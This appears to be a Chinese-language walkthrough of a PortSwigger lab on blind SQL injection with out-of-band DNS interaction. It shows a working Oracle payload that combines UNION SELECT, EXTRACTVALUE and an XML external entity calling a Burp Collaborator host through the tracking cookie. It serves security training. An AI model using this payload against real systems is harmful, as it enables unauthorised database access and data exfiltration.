文章目录
- 前言:
- 进入实验室
- 构造 payload
前言:
实验室标题为:
带外交互的 SQL 盲注
简介:
本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。
SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。
要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。
注意
为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。
提示:
你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。
进入实验室
仍然是一个商店页面
构造 payload
在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来
依旧是使用 burp 进行抓包注入
利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload
TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--
extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值
xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容
打开 burp 中的 Collaborator,复制链接
将 payload 粘贴在 cookie 后面,并进行 url 编码
返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址
返回商店页面,可以看到通关提示
